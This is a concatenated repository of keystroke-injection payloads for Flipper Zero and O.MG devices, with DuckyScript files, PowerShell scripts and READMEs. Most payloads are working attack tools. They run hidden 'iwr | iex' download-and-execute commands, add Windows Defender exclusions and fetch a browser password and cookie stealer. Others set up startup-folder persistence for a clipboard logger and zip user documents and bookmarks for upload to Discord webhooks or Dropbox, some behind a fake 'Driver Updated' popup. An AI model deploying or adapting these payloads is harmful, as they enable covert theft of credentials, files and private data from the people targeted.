# Gets the name of the spotify user
cd "$env:APPDATA\Spotify\Users"
Get-ChildItem > $F1
# Copy Spotify User to Temp Directory to get sent to Dropbox
Copy-Item "$F1" -Destination "$env:tmp/$F1"
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
rm $F1
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/Spotify-Spy/payload.txt
================================================
REM Title: Spotify-Spy
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Water-UnMark/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Water-UnMark/payload.txt
================================================
REM Title: Water-UnMark
REM Author: atomiczsec
REM Target OS: Windows 10
REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
DELAY 2000
GUI r
DELAY 100
STRING powershell Start-Process powershell -verb runAs
DELAY 1000
ALT Y
DELAY 1000
STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
ENTER
DELAY 100
STRING Restart-Computer -Force
ENTER
================================================
FILE: FlipperZero/payloads/Water-UnMark/placeholder
================================================
================================================
FILE: FlipperZero/payloads/cApS-Troll/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# cApS-Troll
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Description
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/cApS-Troll/a.ps1
================================================
while (1){
Start-Sleep -Second 45
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
}
================================================
FILE: FlipperZero/payloads/cApS-Troll/payload.txt
================================================
REM Title: cApS-Troll
REM Author: atomiczsec
REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: Functions/placeholder
================================================
================================================
FILE: Functions/tidal-log.ps1
================================================
# Define the Discord webhook URL
$webhookUrl = "https://discord.com/api/webhooks/XXXXXXX"
# Define the path to the app.log file
$appLogPath = "$env:USERPROFILE\AppData\Roaming\TIDAL\Logs\app.log"
# Check if the file exists
if (Test-Path $appLogPath) {
try {
# Use curl to upload the file to the Discord webhook
$curlCommand = "curl.exe -F 'file1=@$appLogPath' $webhookUrl"
Invoke-Expression $curlCommand
Write-Host "Successfully uploaded the log file to the Discord webhook."
} catch {
Write-Host "An error occurred while uploading the log file to the Discord webhook: $_"
}
} else {
Write-Host "The file $appLogPath does not exist."
}
================================================
FILE: OMG/payloads/Bookmark-Hog/BH.ps1
================================================
#Bookmark-Hog
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: OMG/payloads/Bookmark-Hog/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Bookmark-Hog/payload.txt
================================================
REM Title: Bookmark-Hog
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: OMG/payloads/Bookmark-Hog/placeholder
================================================
================================================
FILE: OMG/payloads/Browser-Grab/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Browser-Grab
A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
## Description
This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe
This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
Finally, discord will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Browser-Grab/b.ps1
================================================
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'YOUR-DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download
Add-MpPreference -ExclusionPath $env:tmp
# Download the exe and save it to temp directory
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
# Execute the Browser Stealer
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
# Exfiltrate the loot to discord
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"
================================================
FILE: OMG/payloads/Browser-Grab/payload.txt
================================================
REM Title: Browser-Grab
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 1000
STRING powershell saps powershell -verb runas
ENTER
DELAY 1000
ALT y
DELAY 1000
STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
================================================
FILE: OMG/payloads/Copy-And-Waste/I.bat
================================================
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: OMG/payloads/Copy-And-Waste/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
================================================
FILE: OMG/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: OMG/payloads/Copy-And-Waste/placeholder
================================================
================================================
FILE: OMG/payloads/De-Bloater/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# De-Bloater
A payload to quickly get "Windows10Debloater"
## Description
This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...
## Getting Started
### Dependencies
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
iwr -useb https://git.io/debloat|iex
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
[Sycnex](https://github.com/Sycnex/Windows10Debloater)
[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
$types = @{
"*.docx" = "Word";
"*.doc" = "Word";
"*.pptx" = "PowerPoint";
"*.xlsx" = "Excel";
"*.pdf" = "PDF";
"*.jpeg" = "JPEG";
"*.png" = "PNG";
"*.jpg" = "JPEG";
"*.csv" = "CSV";
"*.txt" = "Text";
}
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object {$_.Name -like $type}
if ($filteredFiles) {
$zipFile = "$env:TEMP\$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
================================================
FILE: OMG/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
DEFINE URL http://new-url.com/powershell.ps1
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
